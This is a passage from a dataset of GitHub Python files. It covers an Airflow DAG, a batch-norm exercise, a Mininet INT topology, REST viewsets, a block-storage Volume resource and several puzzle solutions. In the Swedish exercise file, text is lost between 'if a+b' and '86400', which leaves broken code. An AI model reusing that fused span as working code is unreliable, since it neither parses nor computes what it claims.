airflow.providers.cncf.kubernetes.operators.kubernetes_pod import KubernetesPodOperator\nfrom airflow.decorators import dag, task\nimport pendulum\n\n\n@dag(\n schedule_interval=None,\n start_date=pendulum.datetime(2021, 1, 1, tz='UTC'),\n catchup=False,\n tags=['legacy']\n)\ndef example_scraper():\n @task\n def scrape():\n k = KubernetesPodOperator(\n name=\"example_scraper\",\n image=\"example_scraper\",\n cmds=[\"python3\", \"scrape.py\", \"--scraper_type\", \"example_scraper\", \"--url\", \"https://www.google.com\"],\n task_id=\"example-scraper\",\n do_xcom_push=True,\n )\n scrape()\n\nsample_dag = example_scraper()\n","repo_name":"SourceGroove/dags","sub_path":"dags/example_scraper_dag.py","file_name":"example_scraper_dag.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34835068564","text":"import numpy as np\nimport cv2\n\n# eps may help you to deal with numerical problem\neps = 1e-5\n\n# rho is the decay rate of running average\nrho = 0.5\n\n# initialize batchnorm runtime mean and var per channel\nmean = 0\nvar = 0\n\n\ndef bn_forward_test(x, gamma, beta, mean, var):\n # X \\in R^{B \\times C} where B is the batch size and C is the number of channels\n # gamma \\in R^{C} and beta \\in R^{C} are the parameters of the BN layer\n # mean \\in R^{C} and var \\in R^{C} are the running mean and var of the BN layer\n\n # nomalize the input per channel\n x_hat = (x - mean) / np.sqrt(var + eps)\n\n # scale and shift\n out = gamma * x_hat + beta\n\n return out\n\n\ndef bn_forward_train(x, gamma, beta):\n # X \\in R^{B \\times C} where B is the batch size and C is the number of channels\n # gamma \\in R^{C} and beta \\in R^{C} are the parameters of the BN layer\n # gamma is the scale and beta is the bias\n\n # compute per channel mean and var\n sample_mean = np.mean(x, axis=0)\n sample_var = np.var(x, axis=0)\n\n # nomalize the input per channel\n x_hat = (x - sample_mean) / np.sqrt(sample_var + eps)\n\n # scale and shift\n out = gamma * x_hat + beta\n\n # update running mean and var\n global mean, var\n mean = rho * mean + (1 - rho) * sample_mean\n var = rho * var + (1 - rho) * sample_var\n\n # save intermidiate variables for computing the gradient when backward\n cache = (gamma, x, sample_mean, sample_var, x_hat)\n return out, cache\n\n\ndef bn_backward(dout, cache):\n # dout \\in R^{B \\times C} is the gradient of the loss with respect to the output of the BN layer\n # cache is the intermidiate variables computed in the forward pass\n\n gamma, _, _, sample_var, x_hat = cache\n\n dgamma = np.sum(x_hat * dout, axis=0) # shape: (C,)\n dbeta = np.sum(dout, axis=0) # shape: (C,)\n dx = dout * gamma / np.sqrt(sample_var + eps) # shape: (B, C)\n\n return dx, dgamma, dbeta\n\n# This function may help you to check your code\n\n\ndef print_info(x):\n print('mean:', np.mean(x, axis=0))\n print('var:', np.var(x, axis=0))\n print('------------------')\n return\n\n\nif __name__ == \"__main__\":\n\n # input data\n train_data = np.zeros((9, 784))\n for i in range(9):\n train_data[i, :] = cv2.imread(\n \"mnist_subset/\"+str(i)+\".png\", cv2.IMREAD_GRAYSCALE).reshape(-1)/255.\n gt_y = np.zeros((9, 1))\n gt_y[0] = 1\n\n val_data = np.zeros((1, 784))\n val_data[0, :] = cv2.imread(\n \"mnist_subset/9.png\", cv2.IMREAD_GRAYSCALE).reshape(-1)/255.\n val_gt = np.zeros((1, 1))\n\n np.random.seed(14)\n\n # Intialize MLP (784 -> 16 -> 1)\n MLP_layer_1 = np.random.randn(784, 16)\n MLP_layer_2 = np.random.randn(16, 1)\n\n # Initialize gamma and beta\n gamma = np.random.randn(16)\n beta = np.random.randn(16)\n\n lr = 1e-1\n loss_list = []\n\n # training\n for i in range(50):\n # Forward\n output_layer_1 = train_data.dot(MLP_layer_1)\n output_layer_1_bn, cache = bn_forward_train(\n output_layer_1, gamma, beta)\n # sigmoid activation function\n output_layer_1_act = 1 / (1+np.exp(-output_layer_1_bn))\n output_layer_2 = output_layer_1_act.dot(MLP_layer_2)\n pred_y = 1 / (1+np.exp(-output_layer_2)) # sigmoid activation function\n\n # compute loss\n loss = -(gt_y * np.log(pred_y) + (1-gt_y) * np.log(1-pred_y)).sum()\n print(\"iteration: %d, loss: %f\" % (i+1, loss))\n loss_list.append(loss)\n\n # Backward : compute the gradient of paratmerters of layer1 (grad_layer_1) and layer2 (grad_layer_2)\n grad_pred_y = -(gt_y/pred_y) + (1-gt_y)/(1-pred_y)\n grad_activation_func = grad_pred_y * pred_y * (1-pred_y)\n grad_layer_2 = output_layer_1_act.T.dot(grad_activation_func)\n grad_output_layer_1_act = grad_activation_func.dot(MLP_layer_2.T)\n grad_output_layer_1_bn = grad_output_layer_1_act * \\\n (1-output_layer_1_act) * output_layer_1_act\n grad_output_layer_1, grad_gamma, grad_beta = bn_backward(\n grad_output_layer_1_bn, cache)\n grad_layer_1 = train_data.T.dot(grad_output_layer_1)\n\n # update parameters\n gamma -= lr * grad_gamma\n beta -= lr * grad_beta\n MLP_layer_1 -= lr * grad_layer_1\n MLP_layer_2 -= lr * grad_layer_2\n\n # validate\n output_layer_1 = val_data.dot(MLP_layer_1)\n output_layer_1_bn = bn_forward_test(output_layer_1, gamma, beta, mean, var)\n # sigmoid activation function\n output_layer_1_act = 1 / (1+np.exp(-output_layer_1_bn))\n output_layer_2 = output_layer_1_act.dot(MLP_layer_2)\n pred_y = 1 / (1+np.exp(-output_layer_2)) # sigmoid activation function\n loss = -(val_gt * np.log(pred_y) + (1-val_gt) * np.log(1-pred_y)).sum()\n print(\"validation loss: %f\" % (loss))\n loss_list.append(loss)\n\n np.savetxt(\"../results/bn_loss.txt\", loss_list)\n","repo_name":"ateb14/Intro2CV","sub_path":"02_assignment/batch_normalization/bn.py","file_name":"bn.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33301373136","text":"# Uses python3\nimport sys\n\ndef binary_search(val, points, left, right, direction):\n print('\\nfirst call val:', val, points, 'left:', left, 'right:', right)\n # l, r = -1, -1\n if right - left == 0:\n print('right == left', left)\n return left\n\n mid = ((right - left) // 2) + left\n print('mid:', mid)\n if val == points[mid]:\n # if mid has no repeated values\n if points[mid-1] != val and points[mid+1] != val:\n print('mid, single:', mid)\n return (mid)\n\n if direction == 'left':\n if 0 < mid and mid <= len(points)//2 and points[mid-1] == val:\n print('left call')\n l = binary_search(val, points, 0, mid-1, 'left')\n elif 0 < mid and mid <= len(points)//2 and points[mid-1] != val:\n l = mid\n print('hit left end:', l)\n return mid\n elif mid == 0 and points[mid] == val:\n print('hit left end of array')\n l = mid\n return l\n return l\n # if values are repeatd to the right of mid\n if direction == 'right':\n if len(points)//2 <= mid and mid < len(points)-1 and points[mid+1] == val:\n print('right call')\n print('val:', val, points, 'mid:', mid, 'right:', right)\n r = binary_search(val, points, mid+1, len(points)-1, 'right')\n elif len(points)//2 <= mid and mid < len(points)-1 and points[mid+1] != val:\n # if points[mid+1] > val, then call binary_search again? And return val if right == left?\n # elif mid >= len(points)//2 and mid < len(points)-1 and points[mid+1] != val:\n ('hit right end')\n r = mid\n return r\n elif mid == len(points)-1 and points[mid] == val:\n print('hit right end of array')\n r = mid\n return r\n return r\n #print('l', l, 'r', r)\n #return (l, r)\n elif val < points[mid]:\n return binary_search(val, points, left, mid-1, direction)\n else:\n return binary_search(val, points, mid+1, right, direction)\n\n # check if midpoint is == val, are there other vals left/right?\n # find left index and right index\n\n # return tuple of index of leftmost/rightmost value, how to determine which direction?\n # run just binary_search with dummy arrays\n\ndef fast_count_segments(starts, ends, points):\n cnt = [0] * len(points)\n ordered = sorted(points)\n # print(points, ordered)\n #write your code here\n for i in range(len(starts)):\n if starts[i] == ends[i]:\n left = binary_search(starts[i], ordered, 0, len(points)-1, 'left')\n right = binary_search(ends[i], ordered, 0, len(points)-1, 'right')\n print(left, right)\n else:\n left = binary_search(starts[i], ordered, 0, len(points)-1, 'left')\n right = binary_search(ends[i], ordered, 0, len(points)-1, 'right')\n print(left, right)\n # take tuple range\n # calculate number of points\n # update cnt array, search for indexes in points\n # matching search value\n return cnt\n\n\n\n# def naive_count_segments(starts, ends, points):\n# cnt = [0] * len(points)\n# for i in range(len(points)):\n# for j in range(len(starts)):\n# if starts[j] <= points[i] <= ends[j]:\n# cnt[i] += 1\n# return cnt\n\nif __name__ == '__main__':\n # input = sys.stdin.read()\n # data = list(map(int, input.split()))\n # n = data[0]\n # m = data[1]\n # starts = data[2:2 * n + 2:2]\n # ends = data[3:2 * n + 2:2]\n # points = data[2 * n + 2:]\n # points = [1, 2, 3, 3, 3]\n # points = [3,3,3,4,5]\n # points = [1, 2, 3, 3, 3, 4, 5]\n points = [1,2,3,4,5]\n points.sort()\n print(binary_search(5, points, 0, len(points)-1, 'left'))\n # print('\\nfast count')\n # fast_count_segments([2],[3], points)\n # # print(points)\n # print(starts, ends)\n #use fast_count_segments\n # cnt = naive_count_segments(starts, ends, points)\n # for x in cnt:\n # print(x, end=' ')\n\n# test0 - 1 0 0\n# test1 - 0 0 1\n# test2 - 2 0\n\n# foreach segment - binary search endpoints in points, get indexes then subtract\n# sort points\n# get range of indices (duplicates?) and use for count for each segment\n","repo_name":"psd314/algos","sub_path":"algorithmic_toolbox/week4_divide_and_conquer/5_organizing_a_lottery/points_and_segments_v0.py","file_name":"points_and_segments_v0.py","file_ext":"py","file_size_in_byte":4389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12945591682","text":"import sys\nimport math\n\ndef calculate_traingle_area():\n a = int(input(\"Första sidlängd: \"))\n b = int(input(\"Andra sidlängd: \"))\n c = int(input(\"Tredje sidlängd: \"))\n if a+b86400:\n dag = restSek//86400\n restSek = restSek - 86400*dag\n if restSek>3600:\n timma = restSek//3600\n restSek = restSek - 3600*timma\n if restSek>60:\n minut = restSek//60\n restSek = restSek - 60*minut\n print(sekund, \"sekunder är lika med:\", dag, \"dag(ar),\", timma, \"h,\", minut, \"min,\", restSek, \"sekunder\")\n\ndef siffersumma():\n tal = input(\"Vilket tal ska siffersumman beräknas till? \")\n total = 0\n for num in tal:\n total += int(num)\n print(\"Siffersumma:\", total)\n\ndef harmsum():\n n = int(input(\"Hur många termer? \"))\n summa=0.0\n for i in range(1, n+1):\n summa = summa + (1/i)\n print(\"Summan är:\", summa)\n\ndef antal_termer():\n malsumma = float(input(\"Vilket värde ska summan överskrida? \"))\n n = 0\n summa=0\n while malsumma>summa:\n n += 1\n summa += 1/n\n print(n, \"stycken termer behövs för att summan ska överskrida\", malsumma)\n\ndef check_duplicates():\n inputList = input(\"Give me a list \").split(\" \")\n inputList.sort()\n for i in range(len(inputList)-1):\n if inputList[i]==inputList[i+1]:\n print(\"There is atleast one duplicate!\")\n break\n\ndef chess_board():\n n=0\n row = 0\n while row < 8:\n n=row\n for i in range (1, 9):\n if n%2==0:\n print(\"*\", end=' ')\n else:\n print(\" \", end=' ')\n n += 1\n print()\n row += 1\n\n\ndef menu():\n print(\"Options\")\n print(\"1: Triangelarea\")\n print(\"2: Sekundkonvertering\")\n print(\"3: Siffersumma\")\n print(\"4: Harmsum\")\n print(\"5: Antal termer\")\n print(\"6: Leta duplicates\")\n print(\"7: Chess\")\n print(\"8: Exit\")\n return int(input(\"Ditt val: \"))\n\nwhile True:\n n = menu()\n if n == 1:\n calculate_traingle_area()\n elif n == 2:\n sekund_konverterare()\n elif n == 3:\n siffersumma()\n elif n == 4:\n harmsum()\n elif n == 5:\n antal_termer()\n elif n == 6:\n check_duplicates()\n elif n == 7:\n chess_board()\n elif n == 8:\n break\n else:\n print(n, \"är inte ett giltigt val.\")\n print()\n#calculate_traingle_area(3, 4, 5)\n#sekund_konverterare()\n#siffersumma()\n#harmsum()\n#antal_termer()\n","repo_name":"Theo-Ing/completed-projects","sub_path":"Övning2/ovning.py","file_name":"ovning.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24711275018","text":"import os\nfrom int_cfg import *\n\ndef run_cfg(model_dir):\n\n vxlan_id = 10\n vxlan_group = '239.0.0.10'\n vxlan_mtu = 1300\n\n h1_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.1', 24, '00:11:22:33:44:51', vxlan_mtu )\n h2_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.2', 24, '00:11:22:33:44:52', vxlan_mtu )\n h3_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.3', 24, '00:11:22:33:44:53', vxlan_mtu )\n h4_vxlan_cfg = VxlanConfig( vxlan_id, vxlan_group, '10.2.1.4', 24, '00:11:22:33:44:54', vxlan_mtu )\n\n host_cfgs = {\n 'h1' : HostConfig( name = 'h1', mac = '00:c0:a0:a0:00:01', ip = '10.0.1.1', prefix_len = 24, vxlan_cfg = h1_vxlan_cfg ),\n 'h2' : HostConfig( name = 'h2', mac = '00:c0:a0:a0:00:02', ip = '10.0.2.2', prefix_len = 24, vxlan_cfg = h2_vxlan_cfg ),\n 'h3' : HostConfig( name = 'h3', mac = '00:c0:a0:a0:00:03', ip = '10.0.3.3', prefix_len = 24, vxlan_cfg = h3_vxlan_cfg ),\n 'h4' : HostConfig( name = 'h4', mac = '00:c0:a0:a0:00:04', ip = '10.0.4.4', prefix_len = 24, vxlan_cfg = h4_vxlan_cfg )\n }\n\n leaf1_port_cfgs = [\n PortConfig( port_no = 0, ip = '10.0.1.100', prefix_len = 24, mac = '00:01:00:00:00:01' ),\n PortConfig( port_no = 1, ip = '10.0.2.100', prefix_len = 24, mac = '00:01:00:00:00:02' ),\n ] \n\n leaf2_port_cfgs = [\n PortConfig( port_no = 0, ip = '10.0.3.100', prefix_len = 24, mac = '00:02:00:00:00:01' ),\n PortConfig( port_no = 1, ip = '10.0.4.100', prefix_len = 24, mac = '00:02:00:00:00:02' ),\n ]\n\n switch_cfgs = [\n SwitchConfig( name = 'leaf1', \n port_cfgs = leaf1_port_cfgs,\n swapi_port = 26000,\n\t\t bmcli_port = 27000,\n config_fs = 'configs/leaf1/l3_int_ref_topo',\n\t\t model_dir = model_dir,\n switch_id = 0x000000A1, pps=400, qdepth=15 ),\n SwitchConfig( name = 'leaf2',\n port_cfgs = leaf2_port_cfgs,\n swapi_port = 26001,\n bmcli_port = 27001,\n config_fs = 'configs/leaf2/l3_int_ref_topo',\n model_dir = model_dir,\n switch_id = 0x000000A2, pps=400, qdepth=15 ),\n SwitchConfig( name = 'spine1',\n port_cfgs = [],\n swapi_port = 26002,\n bmcli_port = 27002,\n config_fs = 'configs/spine1/l3_int_ref_topo',\n model_dir = model_dir,\n switch_id = 0x000000B1, pps=400, qdepth=15 ),\n SwitchConfig( name = 'spine2',\n port_cfgs = [],\n swapi_port = 26003,\n bmcli_port = 27003,\n config_fs = 'configs/spine2/l3_int_ref_topo',\n model_dir = model_dir,\n switch_id = 0x000000B2, pps=400, qdepth=15 ),\n ]\n\n link_cfgs = [\n LinkConfig( 'leaf1', 'h1', 0 ),\n LinkConfig( 'leaf1', 'h2', 1 ),\n LinkConfig( 'leaf1', 'spine1', 2, 0 ),\n LinkConfig( 'leaf1', 'spine2', 3, 0 ),\n\n LinkConfig( 'leaf2', 'h3', 0 ),\n LinkConfig( 'leaf2', 'h4', 1 ),\n LinkConfig( 'leaf2', 'spine1', 2, 1 ),\n LinkConfig( 'leaf2', 'spine2', 3, 1 ),\n ]\n\n mgr = NetworkManager( host_cfgs.values(), switch_cfgs, link_cfgs )\n net = mgr.setupAndStartNetwork()\n\n h1 = net.get('h1')\n h2 = net.get('h2')\n h3 = net.get('h3')\n h4 = net.get('h4')\n\n h1.cmd(\"iperf -s &\")\n h2.cmd(\"iperf -s &\")\n h3.cmd(\"iperf -s &\")\n h4.cmd(\"iperf -s &\")\n\n # TODO: start iperf clients\n h1.cmd(\"iperf -c 10.2.1.4 -t 3000 > /dev/null &\")\n h3.cmd(\"iperf -c 10.2.1.2 -t 3000 > /dev/null &\")\n\n CLI(net)\n\n mgr.cleanup()\n net.stop()\n\nargs = sys.argv\nif len(args) < 2:\n print('Too few arguments. Run the script as follows:')\n print('eg: sudo ./%s --model-dir=$INSTALL_DIR' %\n os.path.basename(__file__))\n exit(1)\n\nif '--model-dir' in args[1]:\n model_dir = args[1].split(\"=\")[1]\nelse:\n print('Invalid format. Run the script as follows:')\n print('eg: sudo ./%s --model-dir=$INSTALL_DIR' %\n os.path.basename(__file__))\n exit(1)\n\nmodel_dir = os.path.join(model_dir, 'bin')\n\n# cleanup from previous run\nos.system('./int_cleanup.sh > /dev/null 2>&1')\nrun_cfg(model_dir)\n","repo_name":"p4lang/p4factory","sub_path":"mininet/int_ref_topology.py","file_name":"int_ref_topology.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"61"} +{"seq_id":"16990587726","text":"from .models import *\nfrom rest_framework import viewsets, permissions\nfrom .serializers import *\n\n\n#Dates Viewset\nclass DatesViewSet(viewsets.ModelViewSet):\n queryset = Dates.objects.all()\n permission_class = [\n permissions.AllowAny\n ]\n serializer_class = DatesSerializer\n\n\n#Project Viewset\nclass ProjectViewSet(viewsets.ModelViewSet):\n queryset = Project.objects.all()\n permission_class = [\n permissions.AllowAny\n ]\n serializer_class = ProjectSerializer","repo_name":"Irenyak1/UETCL-dash","sub_path":"dates/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22006361723","text":"import sys; sys.stdin = open(\"input/4796.txt\", \"r\")\n# 인덱스 설정 위치에 유의하기\nindex = 1\nwhile True:\n L, P, V = map(int, input().split())\n if L == 0 and P == 0 and V == 0:\n break\n result = (V // P * L) + min((V % P), L)\n print(\"Case {}: {}\".format(index, result))\n index += 1","repo_name":"vreez/APS","sub_path":"boj/boj_4796_캠핑.py","file_name":"boj_4796_캠핑.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23406458301","text":"#!/usr/bin/env python\n\nimport re\nimport itertools\n\n\ndef substrings(n):\n return (n[r] for r in itertools.starmap(slice, itertools.combinations(range(len(n)+1), 2)))\n\n\ndef hasconsonants(n):\n v = re.compile(r'[^aeiou]{%s}' % n)\n\n def _f(name):\n return bool(v.search(name))\n return _f\n\n\ndef solve(fin):\n name, n = next(fin).split()\n n = int(n)\n return sum(map(hasconsonants(n), substrings(name)))\n\nif __name__ == '__main__':\n fn = 'A-small-attempt0'\n fin = open(fn + '.in')\n fout = open(fn + '.out', 'w')\n T = int(next(fin))\n for i in range(1, T + 1):\n print(\"Case #{}:\".format(i), solve(fin), file=fout)\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_126/391.py","file_name":"391.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19353195826","text":"from otree.api import Currency as c, currency_range\nfrom . import pages\nfrom ._builtin import Bot\nfrom .models import Constants\nimport random\n\n\nclass PlayerBot(Bot):\n\n def play_round(self):\n # print(\"Round:\" + str(self.round_number))\n\n fake_round = self.round_number <= self.player.session.config['fake_rounds'] and not self.participant.vars['fake_rounds_done']\n real_round = self.round_number == 1 and self.participant.vars['fake_rounds_done']\n max_price = self.player.session.config['max_price']\n if fake_round or real_round:\n if self.round_number == 1:\n yield (pages.Instructions1)\n yield (pages.Instructions2)\n\n group_prime = self.participant.vars['fake_rounds_done'] and \\\n self.session.config['assign_groups']\n\n if group_prime:\n yield (pages.GroupMug)\n\n if random.random() < 0.5:\n yield (pages.Bid, {'object_choice': 'Mug A', 'bid': random.randint(0, max_price)})\n else:\n yield (pages.Bid, {'object_choice': 'Mug B', 'bid': random.randint(0, max_price)})\n yield (pages.Auction)","repo_name":"wutherwalker/ANTISOCIAL","sub_path":"WTP/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23481474331","text":"import os\n\nfile_path_input = os.getcwd() + '/' + 'prob1.in'\nfile_path_output = os.getcwd() + '/' + 'prob1.out'\n\nwith open(file_path_output, 'wb') as output_data:\n\twith open(file_path_input, 'rb') as input_data:\n\t\t\tnum_cases = int(input_data.readline())\n\n\t\t\tfor i in range(num_cases):\n\t\t\t\tcheck_arr = [0]*10\n\t\t\t\t\n\t\t\t\tcurr_numStr = input_data.readline().decode()\n\t\t\t\tcurr_numInt = int(curr_numStr)\n\n\t\t\t\tif curr_numInt == 0:\n\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': INSOMNIA'\n\t\t\t\t\toutput_data.write(out_line.encode())\n\t\t\t\t\toutput_data.write('\\n'.encode())\n\n\t\t\t\telse:\n\t\t\t\t\tmult = 2\n\t\t\t\t\tupdated_numInt = curr_numInt\n\t\t\t\t\twhile 0 in check_arr:\n\t\t\t\t\t\tcurr_numStr = list(str(updated_numInt))\n\n\t\t\t\t\t\tfor num in curr_numStr:\n\t\t\t\t\t\t\tcheck_arr[int(num)] = 1\n\n\t\t\t\t\t\tupdated_numInt = curr_numInt * mult\n\t\t\t\t\t\tmult += 1\n\n\t\t\t\t\tupdated_numInt -= curr_numInt\n\t\t\t\t\tout_line = 'Case #' + str(i+1) + ': ' + str(updated_numInt)\n\t\t\t\t\toutput_data.write(out_line.encode())\n\t\t\t\t\tif i != num_cases-1:\n\t\t\t\t\t\toutput_data.write('\\n'.encode())","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_177/2872.py","file_name":"2872.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23553431831","text":"# helper functions\n\ndef tidy_number(n):\n digits = [int(x) for x in str(n)]\n max_digit = 0\n for i in digits:\n if (i >= max_digit):\n max_digit = i\n else:\n return False\n\n return True\n\n\ndef scale_down(N):\n digits = [int(x) for x in str(N)]\n new = []\n\n for i in range(0, len(digits), 1):\n if (i == len(digits)-1):\n new.append(str(digits[i]))\n break\n\n if(digits[i] <= digits[i+1]):\n new.append(str(digits[i]))\n else:\n new.append(str(digits[i]-1))\n for i in range(len(digits)-(i+1)):\n new.append('9')\n break\n\n return (int(''.join(new)))\n\ndef find_max(N):\n while(True):\n if(tidy_number(N)):\n return N\n break\n else:\n N = scale_down(N)\n\n\n# input and output\nexamples_no = int(input()) # number of instances\nfor i in range(1, examples_no+1):\n n = int(input()) # input integer\n print(\"Case #{}: {}\".format(i, find_max(n)))\n # check out .format's specification for more formatting options\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1711.py","file_name":"1711.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23760634397","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom ecl.block_store import block_store_service\nfrom ecl import format\nfrom ecl import resource\nfrom ecl import utils\n\n\nclass Volume(resource.Resource):\n resource_key = \"volume\"\n resources_key = \"volumes\"\n base_path = \"/volumes\"\n service = block_store_service.BlockStoreService()\n\n # capabilities\n allow_retrieve = True\n allow_create = True\n allow_delete = True\n allow_update = True\n allow_list = True\n\n # Properties\n #: A ID representing this volume.\n id = resource.prop(\"id\")\n #: The name of this volume.\n name = resource.prop(\"name\")\n #: A list of links associated with this volume. *Type: list*\n links = resource.prop(\"links\", type=list)\n\n #: The availability zone.\n availability_zone = resource.prop(\"availability_zone\")\n #: To create a volume from an existing volume, specify the ID of\n #: the existing volume. If specified, the volume is created with\n #: same size of the source volume.\n source_volume_id = resource.prop(\"source_volid\")\n #: The volume description.\n description = resource.prop(\"description\")\n #: To create a volume from an existing snapshot, specify the ID of\n #: the existing volume snapshot. If specified, the volume is created\n #: in same availability zone and with same size of the snapshot.\n snapshot_id = resource.prop(\"snapshot_id\")\n #: The size of the volume, in GBs. *Type: int*\n size = resource.prop(\"size\", type=int)\n #: The ID of the image from which you want to create the volume.\n #: Required to create a bootable volume.\n image_id = resource.prop(\"imageRef\")\n #: The name of the associated volume type.\n volume_type = resource.prop(\"volume_type\")\n #: Enables or disables the bootable attribute. You can boot an\n #: instance from a bootable volume. *Type: bool*\n is_bootable = resource.prop(\"bootable\", type=format.BoolStr)\n #: One or more metadata key and value pairs to associate with the volume.\n metadata = resource.prop(\"metadata\")\n\n #: One of the following values: creating, available, attaching, in-use\n #: deleting, error, error_deleting, backing-up, restoring-backup,\n #: error_restoring. For details on these statuses, see the\n #: Block Storage API documentation.\n status = resource.prop(\"status\")\n #: TODO(briancurtin): This is currently undocumented in the API.\n attachments = resource.prop(\"attachments\")\n #: The timestamp of this volume creation.\n created_at = resource.prop(\"created_at\")\n\n def _action(self, session, body):\n \"\"\"Preform server actions given the message body.\"\"\"\n # NOTE: This is using Server.base_path instead of self.base_path\n # as both Server and ServerDetail instances can be acted on, but\n # the URL used is sans any additional /detail/ part.\n url = utils.urljoin(Volume.base_path, self.id, 'action')\n headers = {'Accept': ''}\n return session.post(\n url, endpoint_filter=self.service, json=body, headers=headers)\n\n def extend_size(self, session, new_size):\n body = {\"os-extend\": {\"new_size\": new_size}}\n return self._action(session, body)\n\n def upload_to_image(self, session, container_format=None,\n disk_format=None,\n image_name=None, force=False):\n\n body = dict()\n if container_format:\n body.update({\"container_format\": container_format})\n if disk_format:\n body.update({\"disk_format\": disk_format})\n if force:\n body.update({\"force\": force})\n if image_name:\n body.update({\"image_name\": image_name})\n return self._action(session, {\"os-volume_upload_image\": body})\n\n def update_bootable(self, session, bootable=False):\n body = {\"os-set_bootable\": {\n \"bootable\": bootable\n }}\n return self._action(session, body)\n\n\nclass VolumeDetail(Volume):\n\n base_path = \"/volumes/detail\"\n\n #: The volume's current back-end.\n host = resource.prop(\"os-vol-host-attr:host\")\n #: The project ID associated with current back-end.\n project_id = resource.prop(\"os-vol-tenant-attr:tenant_id\")\n #: The status of this volume's migration (None means that a migration\n #: is not currently in progress).\n migration_status = resource.prop(\"os-vol-mig-status-attr:migstat\")\n #: The volume ID that this volume's name on the back-end is based on.\n migration_id = resource.prop(\"os-vol-mig-status-attr:name_id\")\n #: Status of replication on this volume.\n replication_status = resource.prop(\"replication_status\")\n #: Extended replication status on this volume.\n extended_replication_status = resource.prop(\n \"os-volume-replication:extended_status\")\n #: ID of the consistency group.\n consistency_group_id = resource.prop(\"consistencygroup_id\")\n #: Data set by the replication driver\n replication_driver_data = resource.prop(\n \"os-volume-replication:driver_data\")\n #: ``True`` if this volume is encrypted, ``False`` if not.\n #: *Type: bool*\n is_encrypted = resource.prop(\"encrypted\", type=format.BoolStr)\n","repo_name":"nttcom/eclsdk","sub_path":"ecl/block_store/v2/volume.py","file_name":"volume.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"39740582151","text":"import unittest\n\ndef parse_input(path_in):\n with open(path_in, 'r') as f:\n input = f.read().split()\n return (input,)\n\n####################### Day 10.1: Syntax Scoring #######################\nL = [\"(\", \"[\", \"{\", \"<\"]\nR = [\")\", \"]\", \"}\", \">\"]\nR2L = dict(zip(R, L))\nL_SET = frozenset(L)\nR_SET = frozenset(R)\n\ndef part1(input):\n scores = dict(zip(R, [3, 57, 1197, 25137]))\n total_score = 0\n for line in input:\n stack = [] # Maintain all left symbols.\n for char in line:\n if char in L_SET:\n stack.append(char)\n else:\n assert char in R_SET\n if stack.pop() != R2L[char]:\n # Corrupted line\n total_score += scores[char]\n break\n return total_score\n\ndef solve_part1():\n input = parse_input(\"input10.txt\")\n return part1(*input)\n\nclass Part1Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != \"part1\":\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n \n def test_part1(self):\n cases = [\"input10_test.txt\"]\n expecteds = [26397]\n for case, expected in zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part1(*parse_input(case))\n self.assertEqual(expected, actual)\n\n####################### Day 10.2: Syntax Scoring #######################\ndef get_median(L):\n return sorted(L)[len(L) // 2] # Favors right in case of tie (len is even).\n\ndef part2(input):\n L_to_score = dict(zip(L, [1, 2, 3, 4]))\n score_multiplier = 5\n scores = []\n for line in input:\n stack = [] # Maintain all left symbols.\n corrupted = False\n for char in line:\n if char in L_SET:\n stack.append(char)\n else:\n assert char in R_SET\n if stack.pop() != R2L[char]:\n corrupted = True\n break # Corrupted line\n \n if corrupted or len(stack) == 0: # Empty stack = complete line\n continue\n \n # If got here, must be incomplete line.\n cur_score = 0\n while len(stack):\n cur_score = (cur_score * score_multiplier) + L_to_score[stack.pop()]\n scores.append(cur_score)\n \n return get_median(scores)\n\ndef solve_part2():\n input = parse_input(\"input10.txt\")\n return part2(*input)\n\nclass Part2Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != \"part2\":\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n \n def test_part2(self):\n cases = [\"input10_test.txt\"]\n expecteds = [288957]\n for case, expected in 